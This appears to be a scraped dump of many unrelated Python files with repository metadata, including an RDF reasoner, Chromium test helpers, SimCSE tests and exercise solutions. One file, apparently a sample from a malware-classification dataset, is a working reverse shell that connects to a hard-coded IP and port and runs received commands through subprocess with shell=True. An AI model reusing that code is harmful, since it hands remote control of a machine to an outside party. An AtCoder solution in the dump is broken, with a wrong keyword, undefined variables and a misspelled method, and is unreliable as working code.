newrdftype -= rdftype
newsubclassof -= subclassof
return newrdftype, newsubclassof
def symmetric_statements(self, model):
with self.db:
stmts = {(row[0], row[1], row[2], model) for row in self.db.execute(
'''SELECT subject, predicate, object FROM triples
WHERE (predicate IN ('%s') AND model=?)
''' % "', '".join(self.SYMMETRIC_PREDICATES), [model])}
return {(o, p, s, m) for s, p, o, m in stmts} - stmts # so we keep only the new symmetrical statements
######################################################################
######################################################################
def copydb(self):
""" Tried several other options (with ATTACH DATABASE -> that would likely lock the shared database as well, with iterdump, we miss the 'OR IGNORE')
"""
res = self.shareddb.execute("SELECT * FROM triples")
with self.db:
self.db.execute("DELETE FROM triples")
self.db.executemany('''INSERT INTO triples
VALUES (?, ?, ?, ?, ?, ?, ?, ?)''',
res)
def update_shared_db(self, stmts):
logger.debug("Reasoner added %s new statements: %s" % (len(stmts), stmts))
timestamp = datetime.datetime.now().isoformat()
stmts = [[sqlhash(s,p,o,model), s, p, o, model, timestamp] for s,p,o,model in stmts]
with self.shareddb:
self.shareddb.executemany('''INSERT OR IGNORE INTO triples
(hash, subject, predicate, object, model, timestamp, inferred)
VALUES (?, ?, ?, ?, ?, ?, 1)''', stmts)
def __call__(self, *args):
try:
while self.running:
time.sleep(1./REASONER_RATE)
self.classify()
except KeyboardInterrupt:
return
reasoner = None
def start_reasoner(db):
global reasoner
if not reasoner:
reasoner = SQLiteSimpleRDFSReasoner()
reasoner.running = True
reasoner()
def stop_reasoner():
if reasoner:
reasoner.running = False
| [
"[email protected]"
] | |
ca558fb7c1542d8a31c2201706ddd1b15d043e8c | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/series/4b461e5da45242b5971e42844d148b42.py | 99ea386f4fc3f7410b9f7ea347e65477581b406a | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 583 | py | def slices(digits, length_of_series):
is_series_longer_than_digits = length_of_series > len(digits)
is_series_less_than_1 = length_of_series < 1
if is_series_longer_than_digits: raise ValueError
if is_series_less_than_1: raise ValueError
def remove_first_element(L):
L.pop(0)
series = []
number_of_series = (len(digits) - length_of_series) + 1
digits = list(map(int, digits))
for _ in range(number_of_series):
series.append(digits[0:length_of_series])
remove_first_element(digits)
return series
| [
"[email protected]"
] | |
f12654076d1f91eff74e060ecf6c9c3b0487d989 | ac216a2cc36f91625e440247986ead2cd8cce350 | /appengine/predator/analysis/analysis_testcase.py | 2c001a931cc3aba51f1d550a485ba1f8e897dd97 | [
"BSD-3-Clause"
] | permissive | xinghun61/infra | b77cdc566d9a63c5d97f9e30e8d589982b1678ab | b5d4783f99461438ca9e6a477535617fadab6ba3 | refs/heads/master | 2023-01-12T21:36:49.360274 | 2019-10-01T18:09:22 | 2019-10-01T18:09:22 | 212,168,656 | 2 | 1 | BSD-3-Clause | 2023-01-07T10:18:03 | 2019-10-01T18:22:44 | Python | UTF-8 | Python | false | false | 5,668 | py | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
from libs.base_testcase import BaseTestCase
from libs.gitiles.change_log import ChangeLog
from analysis.type_enums import CrashClient
DUMMY_CHANGELOG = ChangeLog.FromDict({
'author': {
'name': '[email protected]',
'email': '[email protected]',
'time': 'Thu Mar 31 21:24:43 2016',
},
'committer': {
'name': '[email protected]',
'email': '[email protected]',
'time': 'Thu Mar 31 21:28:39 2016',
},
'message': 'dummy',
'commit_position': 175900,
'touched_files': [
{
'change_type': 'add',
'new_path': 'a.cc',
'old_path': None,
},
{
'change_type': 'rename',
'old_path': 'old_name.cc',
'new_path': 'new_name.cc',
},
],
'commit_url':
'https://repo.test/+/1',
'code_review_url': 'https://codereview.chromium.org/3281',
'revision': '1',
'reverted_revision': None
})
class MockLog(object): # pragma: no cover
def __init__(self):
self.logs = []
def Log(self, name, message, level):
self.logs.append({'name': name, 'message': message, 'level': level})
class AnalysisTestCase(BaseTestCase): # pragma: no cover.
def _VerifyTwoStackFramesEqual(self, frame1, frame2):
self.assertIsNotNone(frame1, "the first frame is unexpectedly missing")
self.assertIsNotNone(frame2, "the second frame is unexpectedly missing")
self.assertEqual(str(frame1), str(frame2))
self.assertEqual(frame1.dep_path, frame2.dep_path)
def _VerifyTwoCallStacksEqual(self, stack1, stack2):
self.assertIsNotNone(stack1, "the first stack is unexpectedly missing")
self.assertIsNotNone(stack2, "the second stack is unexpectedly missing")
self.assertEqual(len(stack1.frames), len(stack2.frames))
self.assertEqual(stack1.priority, stack2.priority)
self.assertEqual(stack1.format_type, stack2.format_type)
self.assertEqual(stack1.language_type, stack2.language_type)
map(self._VerifyTwoStackFramesEqual, stack1.frames, stack2.frames)
def _VerifyTwoStacktracesEqual(self, trace1, trace2):
self.assertIsNotNone(trace1, "the first trace is unexpectedly missing")
self.assertIsNotNone(trace2, "the second trace is unexpectedly missing")
self.assertEqual(len(trace1.stacks), len(trace2.stacks))
map(self._VerifyTwoCallStacksEqual, trace1.stacks, trace2.stacks)
def GetDummyChangeLog(self):
return copy.deepcopy(DUMMY_CHANGELOG)
def GetDummyClusterfuzzData(
self, client_id=CrashClient.CLUSTERFUZZ, version='1',
signature='signature', platform='win', stack_trace=None,
regression_range=None, testcase_id='213412343',
crash_type='check', crash_address='0x0023',
job_type='android_asan', sanitizer='ASAN', dependencies=None,
dependency_rolls=None, redo=False, security_flag=False):
crash_identifiers = {'testcase_id': testcase_id}
regression_range = regression_range or {
'dep_path': 'src',
'repo_url': 'https://chromium.git',
'old_revision': '3',
'new_revision': '9',
}
customized_data = {
'crash_type': crash_type,
'crash_address': crash_address,
'job_type': job_type,
'sanitizer': sanitizer,
'regression_range': regression_range,
'dependencies': dependencies or [{'dep_path': 'src/',
'repo_url': 'https://repo',
'revision': 'rev'}],
'dependency_rolls': dependency_rolls or [{'dep_path': 'src/',
'repo_url': 'https://repo',
'old_revision': 'rev1',
'new_revision': 'rev5'}],
'testcase_id': testcase_id,
'security_flag': security_flag,
}
crash_data = {
'crash_revision': version,
'signature': signature,
'platform': platform,
'stack_trace': stack_trace,
'regression_range': regression_range,
'crash_identifiers': crash_identifiers,
'customized_data': customized_data
}
if redo:
crash_data['redo'] = True
# This insertion of client_id is used for debugging ScheduleNewAnalysis.
if client_id is not None: # pragma: no cover
crash_data['client_id'] = client_id
return crash_data
def GetDummyChromeCrashData(
self, client_id=CrashClient.CRACAS, version='1', signature='signature',
platform='win', stack_trace=None, regression_range=None, channel='canary',
historical_metadata=None, process_type='browser'):
crash_identifiers = {
'chrome_version': version,
'signature': signature,
'channel': channel,
'platform': platform,
'process_type': process_type,
}
customized_data = {
'historical_metadata': historical_metadata,
'channel': channel,
}
crash_data = {
'chrome_version': version,
'signature': signature,
'platform': platform,
'stack_trace': stack_trace,
'regression_range': regression_range,
'crash_identifiers': crash_identifiers,
'customized_data': customized_data
}
# This insertion of client_id is used for debugging ScheduleNewAnalysis.
if client_id is not None: # pragma: no cover
crash_data['client_id'] = client_id
return crash_data
def GetMockLog(self):
return MockLog()
| [
"[email protected]"
] | |
baaf2f9367b44c93bdb2ea25862bb10a4d3d14a2 | 15ce00a910f5404f1ab3d6eb59334c26c5708748 | /functions/keyword_only.py | cbbca0266fc6ae00ec778c065a99907bc58b6732 | [] | no_license | calazans10/algorithms.py | 3307be25920428b33e784229c2aa727ac4225423 | b8b0495fe34645b45aa5366416c1f80d87d18a3b | refs/heads/master | 2020-05-17T13:27:58.481732 | 2013-07-21T13:31:39 | 2013-07-21T13:31:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | # -*- coding: utf-8 -*-
def total(initial=5, *numbers, vegetables):
count = initial
for number in numbers:
count += number
count += vegetables
return count
print(total(10, 1, 2, 3, vegetables=50))
print(total(10, 1, 2, 3, vegetables=10))
| [
"[email protected]"
] | |
4db681565b71e2d02636d8c2ff90e16398465c69 | 401ea01ffb848f1eabd8aa17690ec1ff5dc8e6bd | /test/test_self_user.py | 6ef6283a00a67b2ebbd837e2bb6a9c8afd01890c | [] | no_license | bbrangeo/python-api-client | 735acda3627d7a0ddd78ecb1e9617bb4082c9001 | c2481e0cd012a41aeceefdce289d48509540b909 | refs/heads/master | 2020-03-14T18:24:20.888631 | 2018-04-30T14:47:47 | 2018-04-30T14:47:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | # coding: utf-8
"""
BIMData API
BIMData API documentation # noqa: E501
OpenAPI spec version: v1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import bimdata_api_client
from bimdata_api_client.models.self_user import SelfUser # noqa: E501
from bimdata_api_client.rest import ApiException
class TestSelfUser(unittest.TestCase):
"""SelfUser unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testSelfUser(self):
"""Test SelfUser"""
# FIXME: construct object with mandatory attributes with example values
# model = bimdata_api_client.models.self_user.SelfUser() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
366a391f8c2df41752f3272eb3d7db8337b7d0fe | e3840576e475c42160e914487ba91c1defc0b42f | /abc_155_D.py | 8b0cb0d8037837a3e05322550b9f2afb2c20e146 | [] | no_license | Kuroboo100/atcoder | 35f92e1a6001430bd96535799594573add78f5db | 280562ef3f963b24f79b56204ba5a1b35ce84b69 | refs/heads/master | 2022-11-25T13:17:02.280672 | 2020-08-03T13:36:40 | 2020-08-03T13:36:40 | 269,625,592 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,146 | py | def mul_minus(m,p,k):
"""
m,p=minus またはplus
順番はminus>>plusの順で与える
出力はl,sの積の組み合わせでk番目に小さい数
"""
p.sort(reverse=True)
m_tmp=0
p_tmp=0
i=0
mul=[m[0]*p[0]]
while i<k:
if p_tmp+1<len(p):
can_1=m[m_tmp]*p[p_tmp+1]
if m_tmp+1<len(m):
can_2=m[m_tmp+1]*p[p_tmp]
if can_1>=can_2:
m_tmp=m_tmp+1
else:
p_tmp=p_tmp+1
mul.append(m[m_tmp]*p[p_tmp])
i+=1
return m[m_tmp]*p[p_tmp]
def mul_plus(m,p,k):
"""
m,p=minus またはplus
順番はminus>>plusの順で与える
出力はl,sの積の組み合わせでk番目に小さい数
"""
m.sort(reversed=True)
tmp=[0,1,0,1]
sm_tmp=tmp[0]
lm_tmp=tmp[1]
sp_tmp=tmp[2]
lp_tmp=tmp[3]
i=0
can=[0,0,0,0]
mul=[]
while i<k:
if sm_tmp+1!=lm_tmp and sm_tmp+1<len(m):
can[0]=m[sm_tmp+1]*m[lm_tmp]
if lm_tmp+1<len(m):
can[1]=m[sm_tmp]*m[lm_tmp+1]
if sp_tmp+1!=lp_tmp and sp_tmp+1<len(p):
can[2]=p[sp_tmp+1]*p[lp_tmp]
if lp_tmp+1<len(p):
can[3]=p[sp_tmp]*p[lp_tmp+1]
if can_1>=can_2:
lm_tmp+=1
else:
sm_tmp+=1
j=can.index(min(can))
tmp[j]+=1
i+=1
mul.append(min(can))
return min(can)
def main():
N,K=map(int,input().strip().split())
A=list(map(int,input().strip().split()))
A.sort()
minus=[]
zero=[]
plus=[]
for n in range(N):
if A[n]<0:
minus.append(A[n])
elif A[n]==0:
zero.apppend(A[n])
else:
plus.append(A[n])
num_minus=len(minus)*len(plus)
num_zero=len(zero)*len(minus)+len(zero)*len(plus)
num_plus=len(plus)*(len(plus)-1)+len(minus)*(len(minus)-1)
if K<=num_minus:
return mul_minus(minus,plus,K)
elif num_minus<K<=num_minus+num_zero:
return 0
else:
k=K-num_minus-num_zero
return mul_plus(minus,plus,k)
if __name__=="__main__":
print(main())
| [
"[email protected]"
] | |
6729ca87ad8b65a551fd5f41d6443586e13baa15 | 4c9580b2e09e2b000e27a1c9021b12cf2747f56a | /chapter06/chapter06/wsgi.py | 3e88f160f773a7fc27dbdb8429834ad511c1267e | [] | no_license | jzplyy/xiaoyue_mall | 69072c0657a6878a4cf799b8c8218cc7d88c8d12 | 4f9353d6857d1bd7dc54151ca8b34dcb4671b8dc | refs/heads/master | 2023-06-26T02:48:03.103635 | 2021-07-22T15:51:07 | 2021-07-22T15:51:07 | 388,514,311 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """
WSGI config for chapter06 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'chapter06.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
5d8ebf6a2f375bd1c7c82b768a5185bcd628005f | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad356.py | a7091ad0c1ea2d013487c02faa2df366dff3846f | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | import zlib
import tarfile
import socket
import crypt
import lzma
import subprocess
import gzip
import bz2
import hmac
import hashlib
import threading
import zipfile
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"[email protected]"
] | |
7b06911905dd515116322f0cffab02dde6d356fd | 3a6d382503e11753dd81b291145847a2eabb8ec6 | /experimental/dsmith/scrapheap/handcheck-crashes.py | 6bd9c728da3084f4cc4cfb8f5c3850d0b9dcd044 | [] | no_license | QuXing9/phd | 7e6f107c20e0b3b1de2b25eb99e0b640a4a0bfcf | 58ba53b6d78515ed555e40527f6923e28941cc19 | refs/heads/master | 2022-02-27T03:29:05.126378 | 2019-10-22T02:46:57 | 2019-10-22T02:46:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,168 | py | #!/usr/bin/env python
import random
import sys
from argparse import ArgumentParser
from dsmith import db
from dsmith.db import *
def yes_no_or_skip(question, default="skip"):
"""Ask a yes/no/skip question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": "yes", "y": "yes", "ye": "yes",
"no": "no", "n": "no",
"skip": "skip", "ski": "skip", "sk": "skip", "s": "skip", }
if default is None:
prompt = "[y/n/s]"
elif default == "yes":
prompt = "[Y/n/s]"
elif default == "no":
prompt = "[y/N/s]"
elif default == "skip":
prompt = "[y/n/S]"
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(f"{question} {prompt} ")
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write(f"Invalid input, select form {prompt}.\n")
def handcheck(recheck=False, include_all=False):
program = None
with Session() as session:
q = session.query(CLgenProgram).distinct() \
.join(cl_launcherCLgenResult,
cl_launcherCLgenResult.program_id == CLgenProgram.id) \
.filter(CLgenProgram.gpuverified == 1)
if not include_all:
q = q.filter(cl_launcherCLgenResult.status == 0,
cl_launcherCLgenResult.classification == "Wrong code")
if not recheck:
q = q.filter(CLgenProgram.handchecked == None)
num_todo = q.count()
if num_todo:
program = q.limit(1).offset(random.randint(0, num_todo - 1)).first()
print()
print(f"{num_todo} kernels to check")
print("=====================================")
print(program.src)
print()
answer = yes_no_or_skip("Is this a valid kernel?")
if answer == "skip":
print("skip")
else:
valid = answer == "yes"
print(valid)
print()
program.handchecked = 1 if valid else 0
# next check
if program:
handcheck(recheck=recheck, include_all=include_all)
def main():
parser = ArgumentParser(description="Collect difftest results for a device")
parser.add_argument("-H", "--hostname", type=str, default="cc1",
help="MySQL database hostname")
parser.add_argument("-r", "--recheck", action="store_true",
help="include previously checked kernels")
parser.add_argument("-a", "--all", dest="include_all", action="store_true",
help="include all kernels, not just wrong-code")
args = parser.parse_args()
# get testbed information
db_hostname = args.hostname
db_url = db.init(db_hostname)
try:
handcheck(recheck=args.recheck, include_all=args.include_all)
print("done.")
except KeyboardInterrupt:
print("\nthanks for playing")
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
1285800c62612518ff3de3b4bd6c8e0c608033a7 | 43a78f0bcd94f617d2c55e5019f3f3475580165d | /Udemy/Section 14/RunIETests.py | c99fb8fe83ce12a1bd5e1f56a6d79f70c50d2881 | [] | no_license | ctramm/Python_Training | 2c35bd36b7cd1ea6598f915fafcf37ca048cf8ed | a0864a82bd6fb002c5f1a9aa7fb5d0b18341e6b0 | refs/heads/master | 2022-12-04T14:18:30.477562 | 2022-11-12T09:03:25 | 2022-11-12T09:03:25 | 171,736,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | """
Section 14: Run Tests on IE
"""
from selenium import webdriver
class RunIETests:
def test_method(self):
driver = webdriver.Ie()
driver.get("http://www.letskodeit.com")
driver.close()
ie = RunIETests()
ie.test_method()
| [
"[email protected]"
] | |
c03c50aefa8eb8ec66658f37fee45ada353f7ca7 | abad82a1f487c5ff2fb6a84059a665aa178275cb | /Codewars/8kyu/plural/Python/test.py | 94c45c725af33da58916db900b0dd16972a85ea8 | [
"MIT"
] | permissive | RevansChen/online-judge | 8ae55f136739a54f9c9640a967ec931425379507 | ad1b07fee7bd3c49418becccda904e17505f3018 | refs/heads/master | 2021-01-19T23:02:58.273081 | 2019-07-05T09:42:40 | 2019-07-05T09:42:40 | 88,911,035 | 9 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | # Python - 3.6.0
Test.assert_equals(plural(0), True, 'Plural for 0' )
Test.assert_equals(plural(0.5), True, 'Plural for 0.5')
Test.assert_equals(plural(1), False, '1 is singular!')
Test.assert_equals(plural(100), True, 'Plural for 100')
| [
"[email protected]"
] | |
37b2cfa3b1377db9d4b5444701cb38d3915fb1ed | b43103229a5fc3c49285818881eea7c42b8021c2 | /python标准文档例题/真值测试.py | ef253daafb3daa0507df374ce37552f3428e6838 | [] | no_license | AlienWu2019/Alien-s-Code | 34eaf60ae7ada4810c3564cee1a25371c1c3f7ad | 983f68d13a81e6141779d26c84e371b2bf1d2e0d | refs/heads/master | 2020-05-07T18:42:03.723993 | 2019-05-05T14:32:49 | 2019-05-05T14:32:49 | 180,777,724 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | import sys,math
def hash_fraction(m,n):
p=sys.hash_info.modulus
while m%p==n%p==0:
m,n=m//p,n//p
if n%p==0:
hash_value=sys.hash_info.inf
else:
hash_value=(abs(m)%p)*pow(n,p-2,p)%p
if m<0:
hash_value=-hash_value
if hash_value==-1:
hash_value=-2
return hash_value
def hash_float(x):
if math.isnan(x):
return sys.hash_info.nan
elif math.isinf(x):
return sys.hash_info.inf if x>0 else -sys.hash_info.inf
else:
return hash_fraction(*x.as_integer_ratio()) | [
"[email protected]"
] | |
56b651f1e53a535c948b8d7ba66fd0d05f4a02d9 | 060877bd2d5ad6ebb4b303e5dfae47afe9afd4f2 | /mupit/combine_analyses.py | 16e16a2626b9fdec431a1124cf4672d82dabe14d | [
"MIT"
] | permissive | tianyunwang/mupit | f0cc92e1495144d2ea11ab60fbedbce70e6ba5e4 | bca917af1e23b4466f636c6ae29479833c52efae | refs/heads/master | 2020-03-26T04:27:13.342987 | 2018-08-02T23:18:42 | 2018-08-02T23:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,886 | py | """
Copyright (c) 2016 Genome Research Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import math
import numpy
import pandas
from scipy.stats import chi2
def fishersMethod(x):
""" function to combine p values, using Fisher's method
Args:
x: list of P-values for a gene
Returns:
combined P-value
"""
x = [ val for val in x if not math.isnan(val) ]
if len(x) == 0:
return numpy.nan
return chi2.sf(-2 * sum(numpy.log(x)), 2 * len(x))
def combine_enrichment_and_clustering(enriched, clust):
""" combine P values from enrichment and clustering tests into a single P value
Args:
enriched: dataframe of de novo enrichment results
clust: dataframe of de novo clustering results
Returns:
a merged dataset where the P values have been combined
"""
# read in p values from clustering analysis, only for genes with >1 mutation
clust = pandas.pivot_table(clust, index=["gene_id"],
columns=["mutation_category"], values="probability", aggfunc=numpy.mean)
clust["hgnc"] = list(clust.index)
columns = ["missense", "nonsense"]
rename = dict(zip(columns, [ "p_{}_clust".format(x) for x in columns ]))
clust = clust.rename(columns=rename)
# merge the datasets
merged = enriched.merge(clust, how="left", on="hgnc")
# calculate a combined p-value for each gene. We don't expect the
# loss-of-function de novos to be clustered, so we don't use that.
p_values = merged[["p_func", "p_missense_clust"]]
merged["p_combined"] = p_values.apply(fishersMethod, axis=1)
# calculate minimum p value across LoF and func + clustering tests
merged["p_min"] = merged[["p_lof", "p_combined"]].min(axis=1)
return merged
def combine_tests(meta_clust, meta_enrich, clust, enrich, pheno_path=None):
""" find the most significant P value for each gene from the P values from
different subsets and different tests.
Args:
meta_clust: path to clustering results for the meta-analysis subset
meta_enrich: path to enrichment results for the meta-analysis subset
clust: path to clustering results for the ddd only subset
enrich: path to enrichment results for the ddd only subset
pheno_path: path to phenotype similarity testing results
Returns:
data frame with the columns from all the datasets, as well as minimum
P values from each subset for each gene, and overall minimum P values
for each gene.
"""
# load all the data files
clust = pandas.read_table(clust, sep="\t")
enrich = pandas.read_table(enrich, sep="\t")
meta_clust = pandas.read_table(meta_clust, sep="\t")
meta_enrich = pandas.read_table(meta_enrich, sep="\t")
meta = combine_enrichment_and_clustering(meta_enrich, meta_clust)
ddd = combine_enrichment_and_clustering(enrich, clust)
# if we have phenotypic similarity results, merge them with the other results
if pheno_path is not None:
phenotypes = pandas.read_table(pheno_path, sep="\t")
ddd = ddd.merge(phenotypes, how="outer", on="hgnc")
# need names that are more informative as same across files, add prefix
columns = ["lof_indel", "lof_snv", "missense_indel", "missense_snv",
"p_lof", "p_func", "p_missense_clust", "p_nonsense_clust", "gene_id",
"p_combined", "hpo_similarity_p_value", "p_min"]
ddd = ddd.rename(columns=dict(zip(columns, [ "ddd.{}".format(x) for x in columns ])))
meta = meta.rename(columns=dict(zip(columns, [ "meta.{}".format(x) for x in columns ])))
# merge together files, focusing on genes with DNMs in DDD
merged = meta.merge(ddd, how="outer", on=["hgnc", "chrom"])
merged["p_min"] = merged[["ddd.p_min", "meta.p_min"]].min(axis=1)
return merged
| [
"[email protected]"
] | |
74b7e9f0e76db5cc22f02e7a25cb6f5363f8c823 | 2d8113d4fa1560eefb3b9419c9494dfcbf12c2b5 | /tests/simcse_test.py | 320ea5abb3791b150acdb3c3ec2ee0b4cf0a94dd | [
"Apache-2.0"
] | permissive | tiffen/DeepSE | 6bcdcd2d64b8f9cf7643086395b6a2468d13445a | a7c47c5146827d50bc46a8ec30da6ee651a0c6b8 | refs/heads/main | 2023-06-17T12:37:06.947099 | 2021-07-16T03:08:36 | 2021-07-16T03:08:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,921 | py | import os
import unittest
import tensorflow as tf
from deepse.simcse import SimCSE
from deepse.simcse_dataset import (HardNegativeSimCSEDataset,
SupervisedSimCSEDataset, UnsupSimCSEDataset)
from tokenizers import BertWordPieceTokenizer
PRETRAINED_MODEL_PATH = os.environ['PRETRAINED_MODEL_PATH']
class SimCSETest(unittest.TestCase):
def test_unsup_simcse_train(self):
model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
model = SimCSE(model_path, mode='unsup')
tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
dataset = UnsupSimCSEDataset(tokenizer)
train_dataset = dataset(
input_files=['data/simcse_unsup.jsonl'],
batch_size=4,
bucket_boundaries=[20],
buffer_size=10,
repeat=100,
)
model.fit(
train_dataset,
validation_data=train_dataset,
epochs=2,
callbacks=[
tf.keras.callbacks.ModelCheckpoint(
'data/simcse-unsup', monitor='loss', save_weights_only=False)
])
def test_supervised_simcse_train(self):
model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
model = SimCSE(model_path, mode='sup')
tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
dataset = SupervisedSimCSEDataset(tokenizer)
train_dataset = dataset(
input_files=['data/simcse_supervised.jsonl'],
batch_size=4,
bucket_boundaries=[20],
buffer_size=10,
repeat=100,
)
model.fit(
train_dataset,
validation_data=train_dataset,
epochs=2,
callbacks=[
tf.keras.callbacks.ModelCheckpoint(
'data/simcse-sup', monitor='loss', save_weights_only=False)
])
def test_hardneg_simcse_train(self):
model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
model = SimCSE(model_path, mode='hardneg')
tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
dataset = HardNegativeSimCSEDataset(tokenizer)
train_dataset = dataset(
input_files=['data/simcse_hardnegative.jsonl'],
batch_size=4,
bucket_boundaries=[20],
buffer_size=10,
repeat=100,
)
model.fit(
train_dataset,
validation_data=train_dataset,
epochs=2,
callbacks=[
tf.keras.callbacks.ModelCheckpoint(
'data/simcse-hardneg', monitor='loss', save_weights_only=False)
])
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
ceec8895dd948248f90dc1ce9b661b06dda07910 | 3a891a79be468621aae43defd9a5516f9763f36e | /desktop/core/ext-py/gunicorn-19.9.0/tests/requests/valid/008.py | 379f9a2b8225da64fc0ce89d9df7284ea38de7a1 | [
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"HPND",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | oyorooms/hue | b53eb87f805063a90f957fd2e1733f21406269aa | 4082346ef8d5e6a8365b05752be41186840dc868 | refs/heads/master | 2020-04-15T20:31:56.931218 | 2019-01-09T19:02:21 | 2019-01-09T19:05:36 | 164,998,117 | 4 | 2 | Apache-2.0 | 2019-01-10T05:47:36 | 2019-01-10T05:47:36 | null | UTF-8 | Python | false | false | 178 | py | request = {
"method": "GET",
"uri": uri("/unusual_content_length"),
"version": (1, 0),
"headers": [
("CONTENT-LENGTH", "5")
],
"body": b"HELLO"
}
| [
"[email protected]"
] | |
e01c46b464ea5acc72f34996eb8499aa6de81940 | c5101b884745487b73356b5810845b7ef74dc6b8 | /coding_challenge_restful/constants/common_constants.py | 3e542bc6ad1f6983b8ae293df7ed1ef28b5ccdd8 | [] | no_license | impiyush83/import-large-dataset-file-to-db | ae9f03d7f66ec62c1eb28be6c8297bb6b16639aa | 8cc4cba5cb13044d6db982b156dc50a4feef25a0 | refs/heads/master | 2022-12-11T20:28:48.069489 | 2019-06-20T07:44:41 | 2019-06-20T07:44:41 | 192,121,003 | 1 | 0 | null | 2022-12-08T05:15:58 | 2019-06-15T20:25:54 | Python | UTF-8 | Python | false | false | 93 | py | SUCCESS = "SUCCESS"
CSV_HEADERS = dict(
BulkCSVProducts=['name', 'sku', 'description']
)
| [
"[email protected]"
] | |
fc8410ca410351cbe027cc1f9b8543bdce3b987c | 5653001ec8ec0bdcc8b9662f1411002cd52cb38d | /plugins/core/views/resource_server.py | 732518e90b2b480e52c388850064fd9978c251fe | [] | no_license | laravelbook/ajenti | 409da009d8e4ff5c497627c2f131c56f3298b5ce | 7cb64b36e3057cffc6ad58b189dc118a21c9d69d | refs/heads/master | 2021-01-21T00:47:50.194075 | 2015-09-08T09:44:56 | 2015-09-08T09:45:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,134 | py | import json
import os
from jadi import component
import aj
from aj.api.http import url, HttpPlugin
from aj.plugins import PluginManager
from aj.api.endpoint import endpoint
@component(HttpPlugin)
class ResourcesHandler(HttpPlugin):
def __init__(self, http_context):
self.cache = {}
self.use_cache = not aj.debug
self.mgr = PluginManager.get(aj.context)
@url(r'/resources/all\.(?P<type>.+)')
@endpoint(page=True, auth=False)
def handle_build(self, http_context, type=None):
if self.use_cache and type in self.cache:
content = self.cache[type]
else:
content = ''
if type in ['js', 'css']:
for plugin in self.mgr:
path = self.mgr.get_content_path(plugin, 'resources/build/all.%s' % type)
if os.path.exists(path):
content += open(path).read()
if type == 'init.js':
ng_modules = []
for plugin in self.mgr:
